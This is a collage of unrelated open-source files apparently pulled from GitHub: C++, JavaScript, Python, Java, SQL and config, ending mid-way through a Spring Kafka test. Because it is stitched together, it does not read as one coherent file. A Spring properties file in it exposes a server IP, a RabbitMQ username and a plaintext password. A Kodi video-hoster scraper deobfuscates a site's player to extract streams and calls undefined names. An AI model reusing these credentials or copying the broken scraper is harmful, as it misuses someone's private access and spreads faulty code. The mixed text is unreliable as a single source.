#include "llvm/Support/raw_ostream.h"
#include <cstdlib>
namespace llvm {
SourceMgr SrcMgr;
unsigned ErrorsPrinted = 0;
static void PrintMessage(ArrayRef<SMLoc> Loc, SourceMgr::DiagKind Kind,
const Twine &Msg) {
// Count the total number of errors printed.
// This is used to exit with an error code if there were any errors.
if (Kind == SourceMgr::DK_Error)
++ErrorsPrinted;
SMLoc NullLoc;
if (Loc.empty())
Loc = NullLoc;
SrcMgr.PrintMessage(Loc.front(), Kind, Msg);
for (unsigned i = 1; i < Loc.size(); ++i)
SrcMgr.PrintMessage(Loc[i], SourceMgr::DK_Note,
"instantiated from multiclass");
}
void PrintWarning(ArrayRef<SMLoc> WarningLoc, const Twine &Msg) {
PrintMessage(WarningLoc, SourceMgr::DK_Warning, Msg);
}
void PrintWarning(const char *Loc, const Twine &Msg) {
SrcMgr.PrintMessage(SMLoc::getFromPointer(Loc), SourceMgr::DK_Warning, Msg);
}
void PrintWarning(const Twine &Msg) {
errs() << "warning:" << Msg << "\n";
}
void PrintError(ArrayRef<SMLoc> ErrorLoc, const Twine &Msg) {
PrintMessage(ErrorLoc, SourceMgr::DK_Error, Msg);
}
void PrintError(const char *Loc, const Twine &Msg) {
SrcMgr.PrintMessage(SMLoc::getFromPointer(Loc), SourceMgr::DK_Error, Msg);
}
void PrintError(const Twine &Msg) {
errs() << "error:" << Msg << "\n";
}
void PrintFatalError(const Twine &Msg) {
PrintError(Msg);
// The following call runs the file cleanup handlers.
sys::RunInterruptHandlers();
std::exit(1);
}
void PrintFatalError(ArrayRef<SMLoc> ErrorLoc, const Twine &Msg) {
PrintError(ErrorLoc, Msg);
// The following call runs the file cleanup handlers.
sys::RunInterruptHandlers();
std::exit(1);
}
} // end namespace llvm
| {
"pile_set_name": "Github"
} |
"use strict";
var value = require("../../../object/valid-value")
, toInteger = require("../../../number/to-integer")
, max = Math.max
, min = Math.min;
module.exports = function (searchString/*, position*/) {
var start, self = String(value(this));
start = min(max(toInteger(arguments[1]), 0), self.length);
return self.indexOf(searchString, start) === start;
};
| {
"pile_set_name": "Github"
} |
"""
Brushing Scatter Plot to show data on a table
---------------------------------------------
A scatter plot of the cars dataset, with data tables for horsepower, MPG, and origin.
The tables update to reflect the selection on the scatter plot.
"""
# category: scatter plots
import altair as alt
from vega_datasets import data
source = data.cars()
# Brush for selection
brush = alt.selection(type='interval')
# Scatter Plot
points = alt.Chart(source).mark_point().encode(
x='Horsepower:Q',
y='Miles_per_Gallon:Q',
color=alt.condition(brush, 'Cylinders:O', alt.value('grey'))
).add_selection(brush)
# Base chart for data tables
ranked_text = alt.Chart(source).mark_text().encode(
y=alt.Y('row_number:O',axis=None)
).transform_window(
row_number='row_number()'
).transform_filter(
brush
).transform_window(
rank='rank(row_number)'
).transform_filter(
alt.datum.rank<20
)
# Data Tables
horsepower = ranked_text.encode(text='Horsepower:N').properties(title='Horsepower')
mpg = ranked_text.encode(text='Miles_per_Gallon:N').properties(title='MPG')
origin = ranked_text.encode(text='Origin:N').properties(title='Origin')
text = alt.hconcat(horsepower, mpg, origin) # Combine data tables
# Build chart
alt.hconcat(
points,
text
).resolve_legend(
color="independent"
)
| {
"pile_set_name": "Github"
} |
#-*- coding: utf-8 -*-
#Vstream https://github.com/Kodi-vStream/venom-xbmc-addons
from resources.lib.handler.requestHandler import cRequestHandler
from resources.lib.parser import cParser
from resources.hosters.hoster import iHoster
import urllib, urllib2
import re, base64
import htmlentitydefs
import cookielib
try:
from StringIO import StringIO
import gzip
except:
pass
class cHoster(iHoster):
HOST = 'Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0'
HEADER = None
def __init__(self):
self.__sDisplayName = 'Netu'
self.__sFileName = self.__sDisplayName
self.proxyURL = ''
self.useProxy = False
def getDisplayName(self):
return self.__sDisplayName
def setDisplayName(self, sDisplayName):
self.__sDisplayName = sDisplayName + ' [COLOR skyblue]'+self.__sDisplayName+'[/COLOR]'
def setFileName(self, sFileName):
self.__sFileName = sFileName
def getFileName(self):
return self.__sFileName
def getPluginIdentifier(self):
return 'hqq'
def isDownloadable(self):
return True
def isJDownloaderable(self):
return True
def getPattern(self):
return ''
def __getIdFromUrl(self, sUrl):
sPattern = "http://exashare.com/([^<]+)"
oParser = cParser()
aResult = oParser.parse(sUrl, sPattern)
if (aResult[0] == True):
return aResult[1][0]
return ''
def __getPhpSessionId(self, aHeader):
sReponseCookie = aHeader.getheader("Set-Cookie")
aResponseCookies = sReponseCookie.split(";")
return aResponseCookies[0]
def setUrl(self, sUrl):
self.__sUrl = str(sUrl)
# sPattern = 'http://(?:www.|embed.)exashare.(?:com)/(?:video/|embed\-)?([0-9a-z]+)'
# oParser = cParser()
# aResult = oParser.parse(sUrl, sPattern)
# self.__sUrl = 'http://exashare.com/embed-'+str(aResult[1][0])+'.html'
def checkUrl(self, sUrl):
return True
def getUrl(self):
return self.__sUrl
def getMediaLink(self):
return self.__getMediaLinkForGuest()
def getURLRequestData(self, params = {}, post_data = None):
def urlOpen(req, customOpeners):
if len(customOpeners) > 0:
opener = urllib2.build_opener( *customOpeners )
response = opener.open(req)
else:
response = urllib2.urlopen(req)
return response
cj = cookielib.LWPCookieJar()
response = None
req = None
out_data = None
opener = None
if 'host' in params:
host = params['host']
else:
host = self.HOST
if 'header' in params:
headers = params['header']
elif None != self.HEADER:
headers = self.HEADER
else:
headers = { 'User-Agent' : host }
print 'pCommon - getURLRequestData() -> params: ' + str(params)
#print 'pCommon - getURLRequestData() -> headers: ' + str(headers)
customOpeners = []
#cookie support
if params.get('use_cookie', False):
customOpeners.append( urllib2.HTTPCookieProcessor(cj) )
if params.get('load_cookie', False):
cj.load(params['cookiefile'], ignore_discard = True)
#proxy support
# if self.useProxy == True:
# print 'getURLRequestData USE PROXY'
# customOpeners.append( urllib2.ProxyHandler({"http":self.proxyURL}) )
if None != post_data:
#print 'pCommon - getURLRequestData() -> post data: ' + str(post_data)
if params.get('raw_post_data', False):
dataPost = post_data
else:
dataPost = urllib.urlencode(post_data)
req = urllib2.Request(params['url'], dataPost, headers)
else:
req = urllib2.Request(params['url'], None, headers)
#print req
if not params.get('return_data', False):
out_data = urlOpen(req, customOpeners)
else:
gzip_encoding = False
try:
response = urlOpen(req, customOpeners)
if response.info().get('Content-Encoding') == 'gzip':
gzip_encoding = True
data = response.read()
print response.info()
response.close()
except urllib2.HTTPError, e:
print "out"
if e.code == 404:
print '!!!!!!!! 404: getURLRequestData - page not found handled'
if e.fp.info().get('Content-Encoding') == 'gzip':
gzip_encoding = True
data = e.fp.read()
#e.msg
#e.headers
else:
if e.code in [300, 302, 303, 307] and params.get('use_cookie', False) and params.get('save_cookie', False):
new_cookie = e.fp.info().get('Set-Cookie', '')
print ">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> new_cookie[%s]" % new_cookie
#for cookieKey in params.get('cookie_items', {}).keys():
# cj.clear('', '/', cookieKey)
cj.save(params['cookiefile'], ignore_discard = True)
raise e
try:
if gzip_encoding:
print 'Content-Encoding == gzip'
buf = StringIO(data)
f = gzip.GzipFile(fileobj=buf)
out_data = f.read()
else:
out_data = data
except:
out_data = data
if params.get('use_cookie', False) and params.get('save_cookie', False):
cj.save(params['cookiefile'], ignore_discard = True)
return out_data
def getPage(self, url, addParams = {}, post_data = None):
try:
addParams['url'] = url
if 'return_data' not in addParams:
addParams['return_data'] = True
response = self.getURLRequestData(addParams, post_data)
status = True
except:
printExc()
response = None
status = False
print responde
return (status, response)
def getDataBeetwenReMarkers(self, data, pattern1, pattern2, withMarkers=True):
match1 = pattern1.search(data)
if None == match1 or -1 == match1.start(0): return False, ''
match2 = pattern2.search(data[match1.end(0):])
if None == match2 or -1 == match2.start(0): return False, ''
if withMarkers:
return True, data[match1.start(0): (match1.end(0) + match2.end(0)) ]
else:
return True, data[match1.end(0): (match1.end(0) + match2.start(0)) ]
def parseNETUTV(self, url):
#print("parserDIVEXPRESS url[%s]" % url)
# example video: http://netu.tv/watch_video.php?v=WO4OAYA4K758
def OIO(data, _0x84de):
_0lllOI = _0x84de[0];
enc = _0x84de[1];
i = 0;
while i < len(data):
h1 = _0lllOI.find(data[i]);
h2 = _0lllOI.find(data[i+1]);
h3 = _0lllOI.find(data[i+2]);
h4 = _0lllOI.find(data[i+3]);
i += 4;
bits = h1 << 18 | h2 << 12 | h3 << 6 | h4;
o1 = bits >> 16 & 0xff;
o2 = bits >> 8 & 0xff;
o3 = bits & 0xff;
if h3 == 64:
enc += chr(o1);
else:
if h4 == 64:
enc += chr(o1) + chr(o2);
else:
enc += chr(o1) + chr(o2) + chr(o3);
return enc
def _0ll(string, _0x84de):
ret = _0x84de[1]
i = len(string) - 1
while i >= 0:
ret += string[i]
i -= 1
return ret
#printDBG("parseNETUTV url[%s]\n" % url)
#http://netu.tv/watch_video.php?v=ODM4R872W3S9
match = re.search("=([0-9A-Z]+?)[^0-9^A-Z]", url + '|' )
playerUrl = "http://hqq.tv/player/embed_player.php?vid=%s&autoplay=no" % match.group(1)
print playerUrl
HTTP_HEADER= { 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' }
#HTTP_HEADER['Referer'] = url
#data = self.getPage(playerUrl, {'header' : HTTP_HEADER})
oRequestHandler = cRequestHandler(self.__sUrl)
data = oRequestHandler.request()
data = base64.b64decode(re.search('base64\,([^"]+?)"', data).group(1))
l01 = re.search("='([^']+?)'", data).group(1)
_0x84de = re.search("var _0x84de=\[([^]]+?)\]", data).group(1)
_0x84de = re.compile('"([^"]*?)"').findall(_0x84de)
data = OIO( _0ll(l01, _0x84de), _0x84de )
data = re.search("='([^']+?)'", data).group(1).replace('%', '\\').decode('unicode-escape').encode('UTF-8')
data = re.compile('<input name="([^"]+?)" [^>]+? value="([^"]+?)">').findall(data)
post_data = {}
for idx in range(len(data)):
post_data[ data[idx][0] ] = data[idx][1]
oRequest = cRequestHandler(playerUrl)
oRequest.setRequestType(cRequestHandler.REQUEST_TYPE_POST)
oRequest.addHeaderEntry('Referer', playerUrl)
for aEntry in data:
oRequest.addParameters(aEntry[0], aEntry[1])
data = oRequest.request()
aHeader = oRequest.getResponseHeader();
RealUrl = oRequest.getRealUrl()
#sReponseCookie = aHeader.getheader("Set-Cookie")
sPhpSessionId = self.__getPhpSessionId(aHeader)
#data = self.getPage(playerUrl, {'header' : HTTP_HEADER}, post_data)
#CParsingHelper.writeToFile('/home/sulge/test.html', data)
print aHeader
print data.read()
def getUtf8Str(st):
idx = 0
st2 = ''
while idx < len(st):
st2 += '\\u0' + st[idx:idx + 3]
idx += 3
return st2.decode('unicode-escape').encode('UTF-8')
file_vars = self.getDataBeetwenMarkers(data, 'Uppod(', ')', False)[1]
print "lalala"
print file_vars
file_vars = self.getDataBeetwenMarkers(data, 'file:', ',', False)[1].strip()
file_vars = file_vars.split('+')
file_url = ''
for file_var in file_vars:
file_var = file_var.strip()
if 0 < len(file_var):
match = re.search('''["']([^"]*?)["']''', file_var)
if match:
file_url += match.group(1)
else:
file_url += re.search('''var[ ]+%s[ ]*=[ ]*["']([^"]*?)["']''' % file_var, data).group(1)
if file_url.startswith('#') and 3 < len(file_url):
file_url = getUtf8Str(file_url[1:])
print "[[[[[[[[[[[[[[[[[[[[[[%r]" % file_url
if file_url.startswith('http'):
return file_url
return False
def __getMediaLinkForGuest(self):
#host = self.parseNETUTV(self.__sUrl)
oRequest = cRequestHandler('http://netu.tv/watch_video.php?v=S7DGB15KBN6N')
sHtmlContent = oRequest.request()
aHeader = oRequest.getResponseHeader()
sPhpSessionId = self.__getPhpSessionId(aHeader)
sPattern = '<meta property="og:image" content="([^"]+)" />'
oParser = cParser()
aResult = oParser.parse(sHtmlContent, sPattern)
print sHtmlContent
if (aResult[0] == True):
api_call = aResult[1][0]
return True, api_call
return False, False
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
</assembly>
| {
"pile_set_name": "Github"
} |
spring.application.name=mq-service
server.port=8088
eureka.client.serviceUrl.defaultZone=http://eureka.didispace.com/eureka/
spring.rabbitmq.host=115.29.47.207
spring.rabbitmq.port=5672
spring.rabbitmq.virtualHost=/test
spring.rabbitmq.username=chengzhx76
spring.rabbitmq.password=chengzhx76
| {
"pile_set_name": "Github"
} |
from logging.handlers import BufferingHandler
from gixy.formatters.base import BaseFormatter
class LogHandler(BufferingHandler):
def __init__(self, matcher):
# BufferingHandler takes a "capacity" argument
# so as to know when to flush. As we're overriding
# shouldFlush anyway, we can set a capacity of zero.
# You can call flush() manually to clear out the
# buffer.
super(LogHandler, self).__init__(0)
self.matcher = matcher
def shouldFlush(self, **kwargs):
return False
def emit(self, record):
self.buffer.append(record.__dict__)
def matches(self, **kwargs):
"""
Look for a saved dict whose keys/values match the supplied arguments.
"""
result = False
for d in self.buffer:
if self.matcher.matches(d, **kwargs):
result = True
break
return result
class Matcher(object):
_partial_matches = ('msg', 'message')
def matches(self, d, **kwargs):
"""
Try to match a single dict with the supplied arguments.
Keys whose values are strings and which are in self._partial_matches
will be checked for partial (i.e. substring) matches. You can extend
this scheme to (for example) do regular expression matching, etc.
"""
result = True
for k in kwargs:
v = kwargs[k]
dv = d.get(k)
if not self.match_value(k, dv, v):
result = False
break
return result
def match_value(self, k, dv, v):
"""
Try to match a single stored value (dv) with a supplied value (v).
"""
if type(v) != type(dv):
result = False
elif type(dv) is not str or k not in self._partial_matches:
result = (v == dv)
else:
result = dv.find(v) >= 0
return result
| {
"pile_set_name": "Github"
} |
{
"name": "granim",
"description": "Create fluid and interactive gradients animations with this small js library.",
"main": "index.js",
"authors": [
"Benjamin Blonde",
"Pranay Prakash <[email protected]> (http://pranay.gp)"
],
"license": "MIT",
"keywords": [
"gradient",
"animation"
],
"homepage": "https://sarcadass.github.io/granim.js/",
"moduleType": [
"globals",
"node"
],
"ignore": [
"**/.*",
"node_modules",
"bower_components",
"test",
"tests"
]
}
| {
"pile_set_name": "Github"
} |
/******************************************************************************
* Product: Adempiere ERP & CRM Smart Business Solution *
* Copyright (C) 1999-2007 ComPiere, Inc. All Rights Reserved. *
* This program is free software, you can redistribute it and/or modify it *
* under the terms version 2 of the GNU General Public License as published *
* by the Free Software Foundation. This program is distributed in the hope *
* that it will be useful, but WITHOUT ANY WARRANTY, without even the implied *
* warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. *
* See the GNU General Public License for more details. *
* You should have received a copy of the GNU General Public License along *
* with this program, if not, write to the Free Software Foundation, Inc., *
* 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA. *
* For the text or an alternative of this public license, you may reach us *
* ComPiere, Inc., 2620 Augustine Dr. #245, Santa Clara, CA 95054, USA *
* or via [email protected] or http://www.compiere.org/license.html *
*****************************************************************************/
package org.compiere.model;
import java.math.BigDecimal;
import java.sql.Timestamp;
import org.compiere.util.KeyNamePair;
/** Generated Interface for C_PaymentBatch
* @author Adempiere (generated)
* @version Release 3.5.4a
*/
public interface I_C_PaymentBatch
{
/** TableName=C_PaymentBatch */
public static final String Table_Name = "C_PaymentBatch";
/** AD_Table_ID=411 */
public static final int Table_ID = MTable.getTable_ID(Table_Name);
KeyNamePair Model = new KeyNamePair(Table_ID, Table_Name);
/** AccessLevel = 1 - Org
*/
BigDecimal accessLevel = BigDecimal.valueOf(1);
/** Load Meta Data */
/** Column name AD_Client_ID */
public static final String COLUMNNAME_AD_Client_ID = "AD_Client_ID";
/** Get Client.
* Client/Tenant for this installation.
*/
public int getAD_Client_ID();
/** Column name AD_Org_ID */
public static final String COLUMNNAME_AD_Org_ID = "AD_Org_ID";
/** Set Organization.
* Organizational entity within client
*/
public void setAD_Org_ID (int AD_Org_ID);
/** Get Organization.
* Organizational entity within client
*/
public int getAD_Org_ID();
/** Column name C_PaymentBatch_ID */
public static final String COLUMNNAME_C_PaymentBatch_ID = "C_PaymentBatch_ID";
/** Set Payment Batch.
* Payment batch for EFT
*/
public void setC_PaymentBatch_ID (int C_PaymentBatch_ID);
/** Get Payment Batch.
* Payment batch for EFT
*/
public int getC_PaymentBatch_ID();
/** Column name C_PaymentProcessor_ID */
public static final String COLUMNNAME_C_PaymentProcessor_ID = "C_PaymentProcessor_ID";
/** Set Payment Processor.
* Payment processor for electronic payments
*/
public void setC_PaymentProcessor_ID (int C_PaymentProcessor_ID);
/** Get Payment Processor.
* Payment processor for electronic payments
*/
public int getC_PaymentProcessor_ID();
public I_C_PaymentProcessor getC_PaymentProcessor() throws RuntimeException;
/** Column name Created */
public static final String COLUMNNAME_Created = "Created";
/** Get Created.
* Date this record was created
*/
public Timestamp getCreated();
/** Column name CreatedBy */
public static final String COLUMNNAME_CreatedBy = "CreatedBy";
/** Get Created By.
* User who created this records
*/
public int getCreatedBy();
/** Column name DocumentNo */
public static final String COLUMNNAME_DocumentNo = "DocumentNo";
/** Set Document No.
* Document sequence number of the document
*/
public void setDocumentNo (String DocumentNo);
/** Get Document No.
* Document sequence number of the document
*/
public String getDocumentNo();
/** Column name IsActive */
public static final String COLUMNNAME_IsActive = "IsActive";
/** Set Active.
* The record is active in the system
*/
public void setIsActive (boolean IsActive);
/** Get Active.
* The record is active in the system
*/
public boolean isActive();
/** Column name Name */
public static final String COLUMNNAME_Name = "Name";
/** Set Name.
* Alphanumeric identifier of the entity
*/
public void setName (String Name);
/** Get Name.
* Alphanumeric identifier of the entity
*/
public String getName();
/** Column name Processed */
public static final String COLUMNNAME_Processed = "Processed";
/** Set Processed.
* The document has been processed
*/
public void setProcessed (boolean Processed);
/** Get Processed.
* The document has been processed
*/
public boolean isProcessed();
/** Column name Processing */
public static final String COLUMNNAME_Processing = "Processing";
/** Set Process Now */
public void setProcessing (boolean Processing);
/** Get Process Now */
public boolean isProcessing();
/** Column name ProcessingDate */
public static final String COLUMNNAME_ProcessingDate = "ProcessingDate";
/** Set Processing date */
public void setProcessingDate (Timestamp ProcessingDate);
/** Get Processing date */
public Timestamp getProcessingDate();
/** Column name Updated */
public static final String COLUMNNAME_Updated = "Updated";
/** Get Updated.
* Date this record was updated
*/
public Timestamp getUpdated();
/** Column name UpdatedBy */
public static final String COLUMNNAME_UpdatedBy = "UpdatedBy";
/** Get Updated By.
* User who updated this records
*/
public int getUpdatedBy();
}
| {
"pile_set_name": "Github"
} |
jest.mock('fs-extra');
jest.mock('open');
jest.mock('../../../lib/S3AndCloudFront/configuration-manager');
jest.mock('../../../lib/S3AndCloudFront/helpers/file-uploader');
jest.mock('../../../lib/S3AndCloudFront/helpers/cloudfront-manager');
const fs = require('fs-extra');
const path = require('path');
const open = require('open');
const inquirer = require('inquirer');
const mockirer = require('mockirer');
const configManager = require('../../../lib/S3AndCloudFront/configuration-manager');
const fileUPloader = require('../../../lib/S3AndCloudFront/helpers/file-uploader');
const cloudFrontManager = require('../../../lib/S3AndCloudFront/helpers/cloudfront-manager');
const internalTemplateContents = require('../../../lib/S3AndCloudFront/template.json');
const internalParametersContents = require('../../../lib/S3AndCloudFront/parameters.json');
const mockTemplate = require('../../../__mocks__/mockTemplate');
const mockParameters = require('../../../__mocks__/mockParameters');
const serviceName = 'S3AndCloudFront';
const providerPlugin = 'awscloudformation';
const templateFileName = 'template.json';
const parametersFileName = 'parameters.json';
const DEV = 'DEV (S3 only with HTTP)';
const PROD = 'PROD (S3 with CloudFront using HTTPS)';
const Environments = [DEV, PROD];
const s3IndexModule = require('../../../lib/S3AndCloudFront/index');
describe('s3IndexModule', () => {
const INTERNAL_TEMPLATE_FILE_PATH = path.normalize(path.join(__dirname, '../../../lib/', templateFileName));
const INTERNAL_PARAMETERS_FILE_PATH = path.normalize(path.join(__dirname, '../../../lib/', parametersFileName));
const mockAmplifyMeta = {
providers: {
awscloudformation: {
AuthRoleName: 'checkhosting-20190226163640-authRole',
UnauthRoleArn: 'arn:aws:iam::mockAccountId:role/checkhosting-20190226163640-unauthRole',
AuthRoleArn: 'arn:aws:iam::mockAccountId:role/checkhosting-20190226163640-authRole',
Region: 'us-west-2',
DeploymentBucketName: 'checkhosting-20190226163640-deployment',
UnauthRoleName: 'checkhosting-20190226163640-unauthRole',
StackName: 'checkhosting-20190226163640',
StackId: 'arn:aws:cloudformation:us-west-2:mockAccountId:stack/checkhosting-20190226163640/2c061610-3a28-11e9-acf3-02ee71065ed8',
},
},
hosting: {
S3AndCloudFront: {
service: 'S3AndCloudFront',
providerPlugin: 'awscloudformation',
providerMetadata: {
s3TemplateURL: 'https://s3.amazonaws.com/checkhosting-20190226163640-deployment/amplify-cfn-templates/hosting/template.json',
logicalId: 'hostingS3AndCloudFront',
},
lastPushTimeStamp: '2019-02-27T00:39:17.966Z',
output: {
S3BucketSecureURL: 'https://checkosting-20190226163802-hostingbucket-dev.s3.amazonaws.com',
WebsiteURL: 'http://checkosting-20190226163802-hostingbucket-dev.s3-website-us-west-2.amazonaws.com',
Region: 'us-west-2',
HostingBucketName: 'checkosting-20190226163802-hostingbucket-dev',
},
lastPushDirHash: '83Bhmmec48dILMj3mi2T25B4700=',
},
},
};
const mockAnswers = {
environment: DEV,
};
let mockContext = {
amplify: {
pathManager: {
getBackendDirPath: jest.fn(() => {
return 'mockBackendDirPath';
}),
},
updateamplifyMetaAfterResourceAdd: jest.fn(),
getProjectMeta: jest.fn(() => {
return mockAmplifyMeta;
}),
readJsonFile: jest.fn(path => JSON.parse(fs.readFileSync(path))),
},
print: {
info: jest.fn(),
warning: jest.fn(),
error: jest.fn(),
success: jest.fn(),
},
exeInfo: {
parameters: {},
serviceMeta: {
output: {
WebsiteURL: 'mockWebsiteURL',
},
},
},
parameters: {
options: {},
},
};
beforeAll(() => {
mockirer(inquirer, mockAnswers);
fs.ensureDirSync = jest.fn();
fs.existsSync = jest.fn(() => {
return true;
});
fs.writeFileSync = jest.fn();
fs.readFileSync = jest.fn(filePath => {
let result;
filePath = path.normalize(filePath);
if (filePath.indexOf(templateFileName) > -1) {
if (filePath === INTERNAL_TEMPLATE_FILE_PATH) {
result = JSON.stringify(internalTemplateContents);
} else {
result = JSON.stringify(mockTemplate);
}
} else if (filePath.indexOf(parametersFileName) > -1) {
if (filePath === INTERNAL_PARAMETERS_FILE_PATH) {
result = JSON.stringify(internalParametersContents);
} else {
result = JSON.stringify(mockParameters);
}
}
return result;
});
fileUPloader.run = jest.fn(() => {
return Promise.resolve();
});
cloudFrontManager.invalidateCloudFront = jest.fn(() => {
return Promise.resolve();
});
});
beforeEach(() => {
fs.ensureDirSync.mockClear();
fs.writeFileSync.mockClear();
});
test('enable', async () => {
await s3IndexModule.enable(mockContext);
expect(configManager.init).toBeCalled();
expect(mockContext.amplify.updateamplifyMetaAfterResourceAdd).toBeCalled();
});
test('configure', async () => {
await s3IndexModule.configure(mockContext);
expect(configManager.configure).toBeCalled();
});
test('publish', async () => {
await s3IndexModule.publish(mockContext, { distributionDirPath: 'dist' });
expect(fileUPloader.run).toBeCalled();
expect(cloudFrontManager.invalidateCloudFront).toBeCalled();
expect(open).toBeCalled();
});
test('console', async () => {
await s3IndexModule.console(mockContext);
expect(open).toBeCalled();
});
test('migrate', async () => {
await s3IndexModule.migrate(mockContext);
});
});
| {
"pile_set_name": "Github"
} |
--
-- CREATE_CAST
--
-- Create some types to test with
CREATE TYPE casttesttype;
CREATE FUNCTION casttesttype_in(cstring)
RETURNS casttesttype
AS 'textin'
LANGUAGE internal STRICT IMMUTABLE;
CREATE FUNCTION casttesttype_out(casttesttype)
RETURNS cstring
AS 'textout'
LANGUAGE internal STRICT IMMUTABLE;
CREATE TYPE casttesttype (
internallength = variable,
input = casttesttype_in,
output = casttesttype_out,
alignment = int4
);
-- a dummy function to test with
CREATE FUNCTION casttestfunc(casttesttype) RETURNS int4 LANGUAGE SQL AS
$$ SELECT 1; $$;
SELECT casttestfunc('foo'::text); -- fails, as there's no cast
-- Try binary coercion cast
CREATE CAST (text AS casttesttype) WITHOUT FUNCTION;
SELECT casttestfunc('foo'::text); -- doesn't work, as the cast is explicit
SELECT casttestfunc('foo'::text::casttesttype); -- should work
DROP CAST (text AS casttesttype); -- cleanup
-- Try IMPLICIT binary coercion cast
CREATE CAST (text AS casttesttype) WITHOUT FUNCTION AS IMPLICIT;
SELECT casttestfunc('foo'::text); -- Should work now
-- Try I/O conversion cast.
SELECT 1234::int4::casttesttype; -- No cast yet, should fail
CREATE CAST (int4 AS casttesttype) WITH INOUT;
SELECT 1234::int4::casttesttype; -- Should work now
DROP CAST (int4 AS casttesttype);
-- Try cast with a function
CREATE FUNCTION int4_casttesttype(int4) RETURNS casttesttype LANGUAGE SQL AS
$$ SELECT ('foo'::text || $1::text)::casttesttype; $$;
CREATE CAST (int4 AS casttesttype) WITH FUNCTION int4_casttesttype(int4) AS IMPLICIT;
SELECT 1234::int4::casttesttype; -- Should work now
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2018-2019 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.kafka.listener;
import static org.assertj.core.api.Assertions.assertThatExceptionOfType;
import java.util.Collections;
import org.apache.kafka.clients.consumer.ConsumerConfig;
import org.apache.kafka.common.serialization.StringDeserializer;
import org.junit.jupiter.api.BeforeAll;
import org.junit.jupiter.api.Test;
import org.springframework.context.ApplicationContextException;
import org.springframework.context.annotation.AnnotationConfigApplicationContext;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.kafka.annotation.EnableKafka;
import org.springframework.kafka.annotation.KafkaListener;
import org.springframework.kafka.config.ConcurrentKafkaListenerContainerFactory;
import org.springframework.kafka.core.ConsumerFactory;
import org.springframework.kafka.core.DefaultKafkaConsumerFactory;
import org.springframework.kafka.support.TopicPartitionOffset;
import org.springframework.kafka.test.EmbeddedKafkaBroker;
import org.springframework.kafka.test.condition.EmbeddedKafkaCondition;
import org.springframework.kafka.test.context.EmbeddedKafka;
/**
* @author Gary Russell
* @since 2.1.5
*
*/
@EmbeddedKafka(topics = "missing.group")
public class MissingGroupIdTests {
private static EmbeddedKafkaBroker embeddedKafka;
@BeforeAll
public static void setup() {
embeddedKafka = EmbeddedKafkaCondition.getBroker();
}
@Test
public void testContextFailsWithKafkaListener() {
assertThatExceptionOfType(ApplicationContextException.class).isThrownBy(() -> {
new AnnotationConfigApplicationContext(Config1.class);
})
.withCauseInstanceOf(IllegalStateException.class)
.withMessageContaining("No group.id found in consumer config");
}
@Test
public void testContextFailsWithSubscribedContainer() {
assertThatExceptionOfType(ApplicationContextException.class).isThrownBy(() -> {
new AnnotationConfigApplicationContext(Config2.class);
})
.withCauseInstanceOf(IllegalStateException.class)
.withMessageContaining("No group.id found in consumer config");
}
@Test
public void testContextLoadsWithAssignedContainer() {
new AnnotationConfigApplicationContext(Config3.class).close();
}
@Configuration
@EnableKafka
public static class Config1 {
@Bean
public ConsumerFactory<String, String> cf() {
return new DefaultKafkaConsumerFactory<>(
Collections.singletonMap(ConsumerConfig.BOOTSTRAP_SERVERS_CONFIG,
embeddedKafka.getBrokersAsString()),
new StringDeserializer(), new StringDeserializer());
}
@Bean
public ConcurrentKafkaListenerContainerFactory<String, String> kafkaListenerContainerFactory() {
ConcurrentKafkaListenerContainerFactory<String, String> factory =
new ConcurrentKafkaListenerContainerFactory<>();
factory.setConsumerFactory(cf());
return factory;
}
@KafkaListener(topics = "missing.group")
public void listen(String in) {
// no op
}
}
@Configuration
@EnableKafka
public static class Config2 {
@Bean
public ConsumerFactory<String, String> cf() {
return new DefaultKafkaConsumerFactory<>(
Collections.singletonMap(ConsumerConfig.BOOTSTRAP_SERVERS_CONFIG,
embeddedKafka.getBrokersAsString()),
new StringDeserializer(), new StringDeserializer());
}
@Bean
public KafkaMessageListenerContainer<String, String> container() {
ContainerProperties props = new ContainerProperties("missing.group");
return new KafkaMessageListenerContainer<>(cf(), props);
}
}
@Configuration
@EnableKafka
public static class Config3 {
@Bean
public ConsumerFactory<String, String> cf() {
return new DefaultKafkaConsumerFactory<>(
Collections.singletonMap(ConsumerConfig.BOOTSTRAP_SERVERS_CONFIG,
embeddedKafka.getBrokersAsString()),
new StringDeserializer(), new StringDeserializer());
}
@Bean
public KafkaMessageListenerContainer<String, String> container() {
ContainerProperties props = new ContainerProperties(new TopicPartitionOffset("missing.group", 0));
props.setMessageListener((MessageListener<String, String>) r -> { });
return new KafkaMessageListenerContainer<>(cf(), props);
